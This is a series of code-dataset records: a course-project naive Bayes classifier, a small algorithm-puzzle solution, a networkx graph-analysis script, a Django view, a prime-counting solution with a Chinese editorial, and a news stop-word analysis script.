held-out validationData.\n\n trainingData and validationData are lists of feature Counters. 
The corresponding\n label lists contain the correct label for each datum.\n\n To get the list of all possible features or labels, use self.features and\n self.legalLabels.\n \"\"\"\n\n bestAccuracy = -1\n globalPrev = util.Counter() \n globalConditionalProbability = util.Counter()\n globalNum = util.Counter() \n\n for i in range(len(trainingData)):\n label = trainingLabels[i]\n \n for feature, value in trainingData[i].items():\n globalNum[(feature,label)] += 1\n if(value)==1:\n globalConditionalProbability[(feature, label)] += 1\n globalPrev[label] += 1\n\n for k in kgrid:\n prev = util.Counter()\n conditionalProbability = util.Counter()\n num = util.Counter()\n\n for key,val in globalPrev.items():\n prev[key]+=val\n for key,val in globalNum.items():\n num[key]+=val\n for key,val in globalConditionalProbability.items():\n conditionalProbability[key]+=val\n\n for label in self.legalLabels:\n for feature in self.features:\n conditionalProbability[(feature,label)] +=k\n num[(feature,label)] += k*2 \n\n \n for i,count in conditionalProbability.items():\n conditionalProbability[i] = count * float(1.0/ num[i])\n\n self.prev = prev\n self.prev.normalize()\n self.conditionalProbability = conditionalProbability\n\n pred = self.classify(validationData)\n accuracyCount = sum([pred[i] == validationLabels[i] for i in range(len(validationLabels))])\n\n if(accuracyCount > bestAccuracy):\n bestParams = (prev,conditionalProbability,k)\n bestAccuracy = accuracyCount\n\n self.prev = bestParams[0]\n self.conditionalProbability = bestParams[1]\n self.k = bestParams[2]\n\n\n \"*** YOUR CODE HERE ***\"\n \n\n def classify(self, testData):\n \"\"\"\n Classify the data based on the posterior distribution over labels.\n\n You shouldn't modify this method.\n \"\"\"\n guesses = []\n self.posteriors = [] # Log posteriors are stored for later data analysis (autograder).\n for datum in testData:\n posterior = self.calculateLogJointProbabilities(datum)\n guesses.append(posterior.argMax())\n self.posteriors.append(posterior)\n return guesses\n\n def calculateLogJointProbabilities(self, datum):\n \"\"\"\n Returns the log-joint distribution over legal labels and the datum.\n Each log-probability should be stored in the log-joint counter, e.g.\n logJoint[3] = \n\n To get the list of all possible features or labels, use self.features and\n self.legalLabels.\n \"\"\"\n logJoint = util.Counter()\n\n for label in self.legalLabels:\n logJoint[label] = math.log(self.prev[label])\n\n for feature, value in datum.items():\n if(value)==1:\n logJoint[label] +=math.log(self.conditionalProbability[feature,label])\n else:\n logJoint[label] += math.log(1 - self.conditionalProbability[feature,label])\n return logJoint\n\n def findHighOddsFeatures(self, label1, label2):\n \"\"\"\n Returns the 100 best features for the odds ratio:\n P(feature=1 | label1)/P(feature=1 | label2)\n\n Note: you may find 'self.features' a useful way to loop through all possible features\n \"\"\"\n featuresOdds = []\n\n \"*** YOUR CODE HERE ***\"\n \n for feature in self.features:\n featuresOdds.append((self.conditionalProbability[(feature, label1)]/self.conditionalProbability[feature,label2],feature))\n featuresOdds = [feature for value, feature in sorted(featuresOdds[-100:])]\n\n return 
featuresOdds\n","repo_name":"hgrov52/pacman-AI","sub_path":"classification/classification/classification/naiveBayes.py","file_name":"naiveBayes.py","file_ext":"py","file_size_in_byte":6567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20887610895","text":"# https://www.acmicpc.net/problem/2839\nimport sys\nsys.stdin = open(\"input/설탕배달_input.txt\", \"r\")\n\nn = int(input())\ncount = 0\ndef solution(n):\n count = 0\n while n >= 0:\n if n % 5 == 0:\n count += (n//5)\n print(count)\n break\n n -= 3\n count += 1\n else:\n print(-1)\n\nsolution(n)","repo_name":"kimgahyeon/algorithm","sub_path":"백준/2839.py","file_name":"2839.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18364312977","text":"import networkx as nx # Network operations\nimport numpy as np # Reading .mtx\nfrom scipy.io import mmread # Reading .mtx\nimport matplotlib.pyplot as plt # Basic plotting\nimport operator # Sorting and converting dictionary to a list\nimport pandas as pd # Tables and visualization\nimport collections # Counting\nimport community # Communities\n\ndef mtx_to_graphi(graph, name):\n \"\"\"Converts mtx file to graphi file for further visualization\n\n Args:\n graph (graph): .mtx file graph loaded in networkx.Graph() method.\n name (str): output file name\n \"\"\"\n\n with open('data/'+ name +'.graphml', 'wb') as output_file:\n nx.write_graphml(graph, output_file)\n \n print(name +'.graphml file generated')\n \n\n\ndef network_elements(graph):\n\n \"\"\"Prints basic global and local graph properties\n\n Args:\n graph (graph): .mtx file graph loaded in networkx.Graph() method.\n \"\"\"\n\n # Check if network is directed\n print('Basic graph info: ')\n print('Is directed:', nx.is_directed(graph))\n print('Is weighted:', nx.is_weighted(graph))\n print('Is connected:',nx.is_connected(graph))\n\n \n # Assignment 1\n total_nodes = graph.number_of_nodes()\n print('Broj cvorova N u grafu: ' + str(total_nodes))\n total_edges = graph.number_of_edges()\n print('Broj veza K u grafu: ' + str(total_edges))\n print('Prosjecan broj ulaznih/izlaznih veza: ' + str(len(list(nx.average_degree_connectivity(graph)))))\n # Assignmnt 2\n # Not a directed graph, so average input/output connections are not calculated.\n \n # Assignment 3\n total_weight = graph.size(weight='weight')\n avg_weight = total_weight / total_nodes\n print('Ukupna snaga grafa: ' + str(total_weight))\n print('Prosjecna snaga grafa: ' + str(avg_weight))\n \n # Assignment 4\n conn_comp = nx.number_connected_components(graph)\n conn_comp_max = len(list(max(nx.connected_components(graph), key=len)))\n print('Broj komponenti grafa: ' + str(conn_comp))\n print('Velicina najvece komponente grafa: ' + str(conn_comp_max))\n \n # Assignment 5\n avg_path = nx.average_shortest_path_length(graph)\n print('Prosjecni najkraci put grafa: ' + str(avg_path))\n diam = nx.diameter(graph)\n print('Diametar grafa: ' + str(diam))\n # Eccentricity type: dictionary\n eccent = nx.eccentricity(graph)\n avg_eccent = float(sum(eccent.values())) / len(eccent)\n print('Prosjecna ekscentricnost grafa: ' + str(avg_eccent))\n \n # Assignment 6\n global_eff = nx.global_efficiency(graph)\n print('Globalna ucinkovitost: ' + str(global_eff))\n \n # Assignement 7\n glob_clustering = len(nx.clustering(graph))\n print('Globalni koeficijent grupiranja: ' + str(glob_clustering))\n \n # Assignment 8\n avg_clustering = 
nx.average_clustering(graph)\n print('Prosjecni koeficijent grupiranja: ' + str(avg_clustering))\n \n # Assignment 9\n node_assortativity = nx.degree_assortativity_coefficient(graph)\n print('Asortativnost s obzirom na stupanj cvora: ' + str(node_assortativity))\n \n # Assignment 10 \n\n degree_sequence = sorted([d for n, d in graph.degree()], reverse=True) # degree sequence\n degreeCount = collections.Counter(degree_sequence)\n deg, cnt = zip(*degreeCount.items())\n\n fig, ax = plt.subplots()\n plt.bar(deg, cnt, width=0.80, color=\"b\")\n\n plt.title(\"Degree Histogram\")\n plt.ylabel(\"Count\")\n plt.xlabel(\"Degree\")\n ax.set_xticklabels(deg)\n plt.savefig('plots/plot_degree.png')\n \n # Assignment 11\n degree_cent = nx.degree_centrality(graph)\n betw_cent = nx.betweenness_centrality(graph)\n closeness_cent = nx.closeness_centrality(graph)\n\n # Converted dict to list\n sorted_degree = sorted(degree_cent.items(), key=operator.itemgetter(1), reverse=True)\n sorted_between = sorted(betw_cent.items(), key=operator.itemgetter(1), reverse=True)\n sorted_closeness = sorted(closeness_cent.items(), key=operator.itemgetter(1), reverse=True)\n \n degree_df = pd.DataFrame(sorted_degree, columns=['Node','Degree Centrality'])\n between_df = pd.DataFrame(sorted_between, columns=['Node','Betweeness Centrality'])\n closeness_df = pd.DataFrame(sorted_closeness, columns=['Node','Closeness Centrality'])\n \n print('Degree: ')\n print(degree_df.head(n=10))\n print('Betweeness: ')\n print(between_df.head(n=10))\n print('Closeness: ')\n print(closeness_df.head(n=10))\n \n # Assignment 12\n avg_closeness = float(sum(closeness_cent.values())) / len(closeness_cent)\n print('Prosjecna centralnost blizine: ' + str(avg_closeness))\n\n # Assignment 13\n avg_between = float(sum(betw_cent.values())) / len(betw_cent)\n print('Prosjecna medupolozenost: ' + str(avg_between))\n \n\ndef centralities(graph):\n \"\"\"Calculates local properties (centrality tables) \n Instructions: \n https://networkx.org/documentation/stable/reference/algorithms/centrality.html\n\n Args:\n graph (graph): .mtx file graph loaded in networkx.Graph() method.\n \"\"\"\n \n eigenvector_cent = nx.eigenvector_centrality(graph)\n print('Centrality 1 generated')\n harmonic_cent = nx.harmonic_centrality(graph)\n print('Centrality 2 generated')\n subgraph_cent = nx.subgraph_centrality(graph)\n print('Centrality 3 generated')\n curr_clos_cent = nx.current_flow_closeness_centrality(graph)\n print('Centrality 4 generated')\n load_cent = nx.load_centrality(graph)\n print('Centrality 5 generated')\n\n\n # Converting dict to list\n eigenvector_sorted = sorted(eigenvector_cent.items(), key=operator.itemgetter(1), reverse=True)\n harmonic_sorted = sorted(harmonic_cent.items(), key=operator.itemgetter(1), reverse=True)\n subgraph_sorted = sorted(subgraph_cent.items(), key=operator.itemgetter(1), reverse=True)\n curr_clos_sorted = sorted(curr_clos_cent.items(), key=operator.itemgetter(1), reverse=True)\n load_cent_sorted = sorted(load_cent.items(), key=operator.itemgetter(1), reverse=True)\n\n # Converting list to dataframe\n eigenvector_df = pd.DataFrame(eigenvector_sorted, columns=['Node','Eigen Vector'])\n harmonic_df = pd.DataFrame(harmonic_sorted, columns=['Node','Harmonic'])\n subgraph_df = pd.DataFrame(subgraph_sorted, columns=['Node','Subgraph'])\n curr_clos_df = pd.DataFrame(curr_clos_sorted, columns=['Node','Current Flow closeness'])\n load_cent_df = pd.DataFrame(load_cent_sorted, columns=['Node','Load centrality: '])\n \n # Printing tables\n 
print('\\n5 ADDITIONAL CENTRALITIES:\\n')\n print('Eigenvector: ')\n print(eigenvector_df.head(n=10))\n print('Harmonic: ')\n print(harmonic_df.head(n=10))\n print('Subgraph: ')\n print(subgraph_df.head(n=10))\n print('Current flow closeness: ')\n print(curr_clos_df.head(n=10))\n print('Load centrality: ')\n print(load_cent_df.head(n=10))\n\n\ndef community_analysis(graph):\n \"\"\"Network analysis on meso scale level\n\n Args:\n graph (graph): .mtx file graph loaded in networkx.Graph() method.\n \"\"\"\n \n # Assignment 14\n np.random.seed(42)\n\n partition = community.best_partition(graph)\n\n comm_nodes = collections.Counter(partition.values())\n sorted_communities = sorted(comm_nodes.items(), key=operator.itemgetter(1), reverse=True)\n\n communities_df = pd.DataFrame(sorted_communities, columns=['Community','Nodes'])\n \n print('Top 10 communities:')\n print(communities_df.head(n=10))\n\n # Graphing\n size = float(len(set(partition.values())))\n pos = nx.spring_layout(graph)\n count = 0.\n for com in set(partition.values()) :\n count = count + 1.\n list_nodes = [nodes for nodes in partition.keys()\n if partition[nodes] == com]\n nx.draw_networkx_nodes(graph, pos, list_nodes, node_size = 20,\n node_color = str(count / size))\n\n\n nx.draw_networkx_edges(graph,pos, alpha=0.5)\n plt.savefig('plots/plot_communities.png')\n\n\npsmigr1 = mmread('data/econ-psmigr1.mtx')\nG_psmigr1 = nx.Graph(psmigr1)\n\n# Function calls\nmtx_to_graphi(G_psmigr1, 'psmigr1')\nnetwork_elements(G_psmigr1)\ncentralities(G_psmigr1)\ncommunity_analysis(G_psmigr1)","repo_name":"ailic96/UZ_networks","sub_path":"uz_networks.py","file_name":"uz_networks.py","file_ext":"py","file_size_in_byte":8241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21180627304","text":"from django.shortcuts import render\nfrom blog.models import Post\nfrom books.models import Book, Quote, Author \nfrom events.models import Event\n\ndef home(request):\n posts = Post.objects.all()[:3]\n books = Book.objects.all()\n events = Event.objects.all()\n quotes = Quote.objects.all()\n authors = Author.objects.all()\n return render(request, 'home/home.html',\n {'posts': posts,\n 'books': books,\n 'events': events,\n 'quotes': quotes,\n 'authors': authors})","repo_name":"maciejurm/zyjswiadomieeuv3","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10078642138","text":"'''\n204. Count Primes\nCount the number of prime numbers less than a non-negative number, n.\n\nExample:\n\nInput: 10\nOutput: 4\nExplanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.\n\n204. 
Count Primes\nCount the number of prime numbers less than the non-negative integer n.\n\n
Example:\n\nInput: 10\nOutput: 4\nExplanation: There are 4 primes less than 10; they are 2, 3, 5, 7.\n'''\n\n\n
import math\n\n\nclass Solution(object):\n    def countPrimes(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: int\n        \"\"\"\n
        is_prime_dict = [1] * n\n        is_prime_dict[:2] = [0] * 2\n\n
        def is_prime(num):\n            for i in range(2, int(math.sqrt(num)) + 1):\n                if num % i == 0:\n                    return False\n            return True\n\n
        for i in range(2, int(math.sqrt(n)) + 1):\n            if is_prime(i):\n                is_prime_dict[i*2:n:i] = [0] * ((n - 1 - 2*i) // i + 1)\n\n
        return sum(is_prime_dict)\n\n\n
class Solution20201203(object):\n    def countPrimes(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: int\n        \"\"\"\n
        def is_prime(n):\n            for i in range(2, int(math.sqrt(n)) + 1):\n                if n % i == 0:\n                    return False\n            return True\n\n
        if n < 2:\n            return 0\n        prime_dict = [1 for _ in range(n)]\n\n
        for i in range(2, int(math.sqrt(n)) + 1):\n            if is_prime(i):\n                prime_dict[i*2:n:i] = [0] * ((n - 1 - i*2) // i + 1)\n\n
        return sum(prime_dict) - 2\n\n\n
if __name__ == '__main__':\n    print(bin(100)[::-1][:-2])\n\n# solution\n\n'''\n
Preface\nCounting the primes in [2, n] is a very common exercise with many clever, efficient solutions. Only the usual approaches are covered below; readers can look up further extensions on their own and are welcome to share them in the comments.\n\n
Method 1: Enumeration\nThe most direct idea is to test every number for primality.\n\n
By definition, a prime is a natural number greater than 1 with no divisors other than 1 and itself. So for every number x we could check whether each y in [2, x-1] divides x, but then a single primality test costs O(n) in the worst case, which is too slow to pass all test data.\n\n
Note that if y is a divisor of x, then x/y is also a divisor of x, so it suffices to check only the smaller of the two. The smaller one always falls in [2, sqrt(x)], so we only need to try the numbers in [2, sqrt(x)], which lowers a single check from O(n) to O(sqrt(n)).\n\n
// time-limit warning\nfunc isPrime(x int) bool {\n    for i := 2; i*i <= x; i++ {\n        if x%i == 0 {\n            return false\n        }\n    }\n    return true\n}\n\n
func countPrimes(n int) (cnt int) {\n    for i := 2; i < n; i++ {\n        if isPrime(i) {\n            cnt++\n        }\n    }\n    return\n}\n\n
Complexity analysis\n\nTime complexity: O(n*sqrt(n)). A single check costs O(sqrt(n)) and O(n) numbers are checked, so the total is O(n*sqrt(n)).\n\nSpace complexity: O(1).\n\n
Method 2: Sieve of Eratosthenes\nEnumeration ignores how the numbers relate to each other, so its time complexity is hard to improve further. The classic algorithm below, proposed by the Greek mathematician Eratosthenes, is known as the sieve of Eratosthenes.\n\n
It rests on this fact: if x is prime, then the multiples of x greater than x, i.e. 2x, 3x, ..., are certainly not prime.\n\n
Let isPrime[i] record whether the number i is prime (1) or not (0). Traverse the numbers from small to large; whenever a number is prime, mark all of its multiples (except the number itself) as composite, i.e. 0. When the traversal ends, the count of primes is known.\n\n
Correctness is fairly evident: the method never marks a prime as composite; conversely, when the traversal reaches a composite x, it must be an integer multiple of some prime y < x, so x was already marked with isPrime[x] = 0 when y was processed. Hence no composite is left marked as prime either.\n\n
One further optimization: for a prime x, starting the marking at 2x is redundant; we can start directly from x*x, because 2x, 3x, ... were already marked earlier as multiples of smaller primes such as 2 and 3.\n\n
func countPrimes(n int) (cnt int) {\n    isPrime := make([]bool, n)\n    for i := range isPrime {\n        isPrime[i] = true\n    }\n
    for i := 2; i < n; i++ {\n        if isPrime[i] {\n            cnt++\n            for j := 2 * i; j < n; j += i {\n                isPrime[j] = false\n            }\n        }\n    }\n    return\n}\n\n
Complexity analysis\n\n
Time complexity: O(n log log n). The proof is not expanded here; in essence it bounds the sum of n/p over primes p. A looser upper bound of O(n log n) is easy to see: it corresponds to the sum of n/i for i = 1..n, and O(sum(n/i)) = O(n * sum(1/i)); since the sum of the reciprocals of 1..n approaches log n, O(n * sum(1/i)) = O(n log n).\n\n
Space complexity: O(n) — we need O(n) space to record whether each number is prime.
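For reference, the same sieve of Eratosthenes in Python — a sketch of mine rather than part of the original editorial, matching the Python used in the solutions above:

import math

def count_primes(n):
    # Sieve of Eratosthenes: count primes strictly below n.
    if n < 2:
        return 0
    is_prime = [True] * n
    is_prime[0] = is_prime[1] = False
    for i in range(2, int(math.sqrt(n)) + 1):
        if is_prime[i]:
            # start at i*i: smaller multiples were already marked by smaller primes
            is_prime[i*i:n:i] = [False] * len(range(i*i, n, i))
    return sum(is_prime)

assert count_primes(10) == 4  # primes below 10: 2, 3, 5, 7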
\n\nif __name__ == '__main__':\n
    print(bin(100)[::-1][:-2])\n\n
# solution\n\n
'''\n
Preface\n
Counting the primes in [2, n] is a very common problem with many clever and efficient solutions. The following only covers the usual approaches; readers can look up further extensions on their own, and are welcome to share and discuss in the comments.\n\n
Method 1: enumeration\n
The most direct idea is to test every number and decide whether it is prime.\n\n
Recall the definition of a prime: a natural number greater than 1 that has no divisors other than 1 and itself. So for each number x we could enumerate every y in [2, x-1] from small to large and check whether y divides x. But then a single primality test costs O(n) in the worst case, which cannot pass all the test data.\n\n
Note that if y divides x, then x/y also divides x, so it suffices to check either y or x/y. If we always check the smaller of the two, that smaller value must fall in [2, sqrt(x)], so we only need to enumerate [2, sqrt(x)]. This lowers a single test from O(n) to O(sqrt(n)).\n\n
Go\n\n
// warning: this version times out\n
func isPrime(x int) bool {\n
    for i := 2; i*i <= x; i++ {\n
        if x%i == 0 {\n
            return false\n
        }\n
    }\n
    return true\n
}\n\n
func countPrimes(n int) (cnt int) {\n
    for i := 2; i < n; i++ {\n
        if isPrime(i) {\n
            cnt++\n
        }\n
    }\n
    return\n
}\n
Complexity analysis\n\n
Time complexity: O(n * sqrt(n)). A single check costs O(sqrt(n)) and we run O(n) checks, so the total is O(n * sqrt(n)).\n\n
Space complexity: O(1).\n\n
Method 2: sieve of Eratosthenes\n
Plain enumeration ignores how the numbers relate to one another, so its time complexity is hard to improve further. Next we introduce a classic algorithm, proposed by the Greek mathematician Eratosthenes and called the sieve of Eratosthenes.\n\n
It rests on the following fact: if x is prime, then the multiples of x greater than x, namely 2x, 3x, ..., are certainly not prime, and we can start from there.\n\n
Let isPrime[i] record whether the number i is prime: 1 if it is, 0 otherwise. Traverse the numbers from small to large; whenever a number is prime, mark all of its multiples (except the prime itself) as composite, i.e. 0. When the traversal ends we know how many primes there are.\n\n
Correctness is fairly evident: the procedure clearly never marks a prime as composite. On the other hand, when the traversal reaches a composite x, x must be an integer multiple of some prime y smaller than x, so by the steps above x was already marked with isPrime[x] = 0 back when y was processed. Hence no composite is left marked as prime either.\n\n
One further optimization: for a prime x, starting the marking at 2x as above is redundant; we should start directly at x*x, because 2x, 3x, ... must already have been marked before reaching x, as multiples of smaller numbers, e.g. all multiples of 2, all multiples of 3, and so on.\n\n
Go\n\n
func countPrimes(n int) (cnt int) {\n
    isPrime := make([]bool, n)\n
    for i := range isPrime {\n
        isPrime[i] = true\n
    }\n
    for i := 2; i < n; i++ {\n
        if isPrime[i] {\n
            cnt++\n
            for j := 2 * i; j < n; j += i {\n
                isPrime[j] = false\n
            }\n
        }\n
    }\n
    return\n
}\n
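\nThe same sieve in Python (a sketch added in this translation, mirroring the Go version above; it is not part of the original editorial):\n\n
def count_primes_eratosthenes(n):\n
    # strike out every multiple of each prime, starting at i * i\n
    is_prime = [True] * n\n
    cnt = 0\n
    for i in range(2, n):\n
        if is_prime[i]:\n
            cnt += 1\n
            for j in range(i * i, n, i):\n
                is_prime[j] = False\n
    return cnt\n\n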
Complexity analysis\n\n
Time complexity: O(n log log n). The detailed proof is not expanded here; readers can work it out or look it up online. In essence it amounts to evaluating the sum over primes p of n/p. A looser upper bound of O(n log n) is easy to see: it corresponds to the sum over i = 1..n of n/i, and O(sum_i n/i) = O(n * sum_i 1/i); the sum of the reciprocals of 1..n approaches log n, so O(n * sum_i 1/i) = O(n log n).\n
Space complexity: O(n). We need O(n) space to record whether each number is prime.\n
Method 3: linear sieve\n
This method is beyond the scope of interviews; this section only gives a brief explanation.\n\n
The sieve of Eratosthenes still performs redundant marking: the number 15, for instance, is marked as composite by both 3 and 5. Our optimization goal is to mark each composite exactly once, which guarantees O(n) total time; this is the linear sieve introduced next.\n\n
Compared with the sieve of Eratosthenes, we additionally maintain a primes array holding the set of primes found so far. We traverse from small to large, and if the current number x is prime we append it to primes.\n\n
Another difference is that the marking step is no longer performed only when x is prime; it runs for every integer x. For an integer x we no longer mark all of its multiples x*x, x*(x+1), ..., but only the products of x with the numbers in the prime set, i.e. primes[0]*x, primes[1]*x, ..., and we stop the marking as soon as we find x mod primes[i] == 0.\n\n
The core point: if x is divisible by primes[i], then the composite y = x * primes[i+1] will certainly be marked later, when the traversal reaches (x / primes[i]) * primes[i+1]; the same holds for the rest. This guarantees that every composite is sieved out only by its smallest prime factor, i.e. each composite is marked exactly once.\n\n
The linear sieve has further uses as well; interested readers can search for the keyword \"multiplicative function\" to explore how it helps solve problems involving multiplicative functions.\n\n
Go\n\n
func countPrimes(n int) int {\n
    primes := []int{}\n
    isPrime := make([]bool, n)\n
    for i := range isPrime {\n
        isPrime[i] = true\n
    }\n
    for i := 2; i < n; i++ {\n
        if isPrime[i] {\n
            primes = append(primes, i)\n
        }\n
        for _, p := range primes {\n
            if i*p >= n {\n
                break\n
            }\n
            isPrime[i*p] = false\n
            if i%p == 0 {\n
                break\n
            }\n
        }\n
    }\n
    return len(primes)\n
}\n\n
C\n\n
int countPrimes(int n) {\n
    if (n < 2) {\n
        return 0;\n
    }\n
    int isPrime[n];\n
    int primes[n], primesSize = 0;\n
    memset(isPrime, 0, sizeof(isPrime));\n
    for (int i = 2; i < n; ++i) {\n
        if (!isPrime[i]) {\n
            primes[primesSize++] = i;\n
        }\n
        for (int j = 0; j < primesSize && i * primes[j] < n; ++j) {\n
            isPrime[i * primes[j]] = 1;\n
            if (i % primes[j] == 0) {\n
                break;\n
            }\n
        }\n
    }\n
    return primesSize;\n
}\n
Complexity analysis\n\n
Time complexity: O(n).\n\n
Space complexity: O(n).\n\n
Author: LeetCode-Solution\n
Link: https://leetcode-cn.com/problems/count-primes/solution/ji-shu-zhi-shu-by-leetcode-solution/\n
Source: LeetCode (LeetCode-CN)\n
The copyright belongs to the author. For commercial reprints, please contact the author for authorization; for non-commercial reprints, please cite the source.\n
'''\n\n
","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/math_binary/leetcode-204-CountPrimes.py","file_name":"leetcode-204-CountPrimes.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
 +{"seq_id":"764544218","text":"import Extract_noun as extract\n
from sqlalchemy.orm import scoped_session, sessionmaker\n
from vo.WssNewsNdlsWrdAnalsVO import WssNewsNdlsWrdAnalsVO\n
from vo.NewsColctVO import NewsColctVO\n
from vo.CodeDtstmnVO import CodeDtstmnVO\n
from vo.WssNewsKwrdManageVO import WssNewsKwrdManageVO\n
import sqlalchemy as db\n
import logging\n
import json\n
import collections as ct\n
import config\n
from sqlalchemy.dialects.postgresql import insert\n\n
logger = logging.getLogger()\n\n
# configuration values\n
url = config.jdbc_url\n
engine = db.create_engine(config.jdbc_url)\n
limit = config.regex_limit\n
page = config.regex_page\n
user_id = config.regex_user_id\n\n
# acquire a session\n
def get_session():\n
    try:\n
        Session = scoped_session(sessionmaker(autocommit=False, autoflush=True, expire_on_commit=False, bind=engine))\n
        sub_session = Session()\n
        return sub_session\n
    except Exception as e:\n
        logger.error(e)\n\n
# close the session\n
def close_session(session):\n
    try:\n
        session.close()\n
    except Exception as e:\n
        logger.error(e)\n
    finally:\n
        if session is not None:\n
            session.close()\n\n
# def findStopWordList(session, stop_word_list, stopWordDict, news_nouns, news_url):\n
#     # news_url is the primary key\n
#     ndls_wrd = dict()\n
#     ndls_wrd_list = []\n\n
#     # when the news has no body text\n
#     if news_nouns is None or news_nouns == 'null' or len(news_nouns) < 1:\n
#         return None\n\n
#     for k in stop_word_list :\n
#         vo = dict(filter(lambda elem:elem[0] == k, news_nouns.items()))\n
#         if len(vo) > 0 :\n
#             ndls_wrd_list.append(vo)\n\n
#     if ndls_wrd_list :\n
#         for r in ndls_wrd_list :\n
#             for k, v in r.items():\n
#                 ndls_wrd[k] = v\n
#                 insertStmt = insert(WssNewsNdlsWrdAnalsVO).values(\n
#                     news_url = news_url,\n
#                     ndls_wrd_code = stopWordDict[k],\n
#                     ndls_wrd_cnt = v,\n
#                     register_id = 'system',\n
#                     rgsde = 'now()',\n
#                     updusr_id = 'system',\n
#                     updde = 'now()'\n
#                 ).on_conflict_do_nothing(\n
#                     constraint = \"pk_wss_news_ndls_wrd_anals\"\n
#                 )\n
#                 session.execute(insertStmt)\n\n
#     if len(ndls_wrd) > 0 : \n
#         return ndls_wrd\n
#     else :\n
#         None\n\n
def findStopWordList(session, stop_word_list, stopWordDict, news_nouns, news_url, ndlsWrdList):\n
    # news_url is the primary key\n
    ndls_wrd = dict()\n
    ndls_wrd_list = []\n
    retList = []\n\n
    # when the news has no body text\n
    if news_nouns is None or news_nouns == 'null' or len(news_nouns) < 1: \n
        return None\n\n
    for k in stop_word_list :\n
        vo = dict(filter(lambda elem:elem[0] == k, news_nouns.items()))\n
        if len(vo) > 0 :\n
            ndls_wrd_list.append(vo)\n\n
    # drop duplicate dicts by comparing their sorted item tuples\n
    retList = list(map(dict, set(tuple(sorted(d.items())) for d in ndls_wrd_list)))\n\n
    if retList :\n
        for r in retList :\n
            for k, v in r.items():\n
                ndls_wrd[k] = v\n
                ndlsWrdList.append(dict(\n
                    news_url = news_url,\n
                    ndls_wrd_code = stopWordDict[k],\n
                    ndls_wrd_cnt = v,\n
                    register_id = 'system',\n
                    rgsde = 'now()',\n
                    updusr_id = 'system',\n
                    updde = 'now()'\n
                ))\n
    if len(ndls_wrd) > 0 : \n
        return ndls_wrd\n
    else :\n
        return None\n\n
def insertComptAt(session, news_url) :\n
    try:\n
        t_obj = dict()\n
        t_obj['news_url'] = news_url\n
        t_obj['ndls_wrd_anals_compt_at'] = \"Y\"\n
        session.query(NewsColctVO).filter(NewsColctVO.news_url == t_obj['news_url']).update(t_obj)\n
        session.commit()\n\n
    except Exception as e:\n
        raise e\n\n
def comptUpdateVO(news_url) :\n
    try:\n
        t_obj = dict()\n
        t_obj['news_url'] = news_url\n
        t_obj['ndls_wrd_anals_compt_at'] = \"Y\"\n
        return t_obj\n\n
    except Exception as e:\n
        raise e\n\n
def comptUpdateNdlsWrdVO(news_url, ndls_wrd) :\n
    try:\n
        t_obj = dict()\n
        t_obj['news_url'] = news_url\n
        t_obj['ndls_wrd_anals_compt_at'] = \"Y\"\n
        if (ndls_wrd is not None and len(ndls_wrd) > 0 ) : t_obj['ndls_wrd'] = json.dumps(ndls_wrd, ensure_ascii=False)\n
        return t_obj\n\n
    except Exception as e:\n
        raise e\n\n\n
def main():\n
    try:\n
        print(\"start\")\n\n
        stop_word_list = []\n
        stopWordDict = dict()\n
        extract_noun = extract.Extract_noun(\"ndls_wrd\")\n\n
        session = get_session()\n
        session.begin()\n\n
        record = 0\n
        global page, limit, user_id\n\n
        if bool(limit) != True:\n
            raise Exception(\"설정 오류\")\n\n
        # list of news rows: not yet analyzed, with a non-empty body\n
        news_rs = session.query(NewsColctVO).where(NewsColctVO.ndls_wrd_anals_compt_at == \"N\", NewsColctVO.news_bdt != 'null', NewsColctVO.news_bdt.isnot(None))\n
        # keyword management number\n
        manage_vo = session.query(WssNewsKwrdManageVO).where(WssNewsKwrdManageVO.use_yn == 'Y', WssNewsKwrdManageVO.delete_yn == 'N').one()\n\n\n
        # keyword exclusion (stop word) entries\n
        stop_word_cur = session.query(CodeDtstmnVO).where(CodeDtstmnVO.code_usgstt == '1', CodeDtstmnVO.code_column_nm == 'ndls_wrd')\n\n
        for word_obj in stop_word_cur:\n
            stopWordDict[word_obj.code_dc] = word_obj.code_no\n
            stop_word_list.append(word_obj.code_dc)\n\n
        record = news_rs.limit(limit).all()\n\n
        while record :\n
            print(\"start loop\")\n\n
            ndlsWrdList = []\n
            comptUpdateList = []\n\n
            for row in record:\n\n
                print(\"row : \", row)\n
                news_nouns_dict = None\n
                news_url = row.news_url\n\n
                if row.news_noun is not None and len(row.news_noun) > 0 :\n
                    news_nouns_dict = 
row.news_noun\n
                else :\n
                    if row.news_bdt is None or row.news_bdt == 'null' or len(row.news_bdt) < 1 :\n
                        comptUpdateList.append(comptUpdateVO(news_url))\n
                        # insertComptAt(session, row.news_url)\n
                        continue\n\n
                    news_nouns = extract_noun.getNouns(row.news_bdt)\n\n
                    if news_nouns is None or len(news_nouns) < 1 :\n
                        comptUpdateList.append(comptUpdateVO(news_url))\n
                        # insertComptAt(session, row.news_url)\n
                        continue\n\n
                    news_nouns_dict = extract_noun.getNounsCntDict(news_nouns)\n\n
                if news_nouns_dict is not None and len(news_nouns_dict) > 0 : \n
                    # skip news that contain a registered stop word\n
                    ndls_wrd = findStopWordList(session, stop_word_list, stopWordDict, news_nouns_dict, news_url, ndlsWrdList)\n
                else :\n
                    comptUpdateList.append(comptUpdateVO(news_url))\n
                    continue\n\n
                comptUpdateList.append(comptUpdateNdlsWrdVO(news_url, ndls_wrd))\n
                # t_obj = dict()\n
                # t_obj['news_url'] = row.news_url\n
                # t_obj['ndls_wrd_anals_compt_at'] = \"Y\"\n
                # if (ndls_wrd is not None and len(ndls_wrd) > 0 ) : t_obj['ndls_wrd'] = json.dumps(ndls_wrd, ensure_ascii=False)\n
                # session.query(NewsColctVO).filter(NewsColctVO.news_url == t_obj['news_url']).update(t_obj)\n
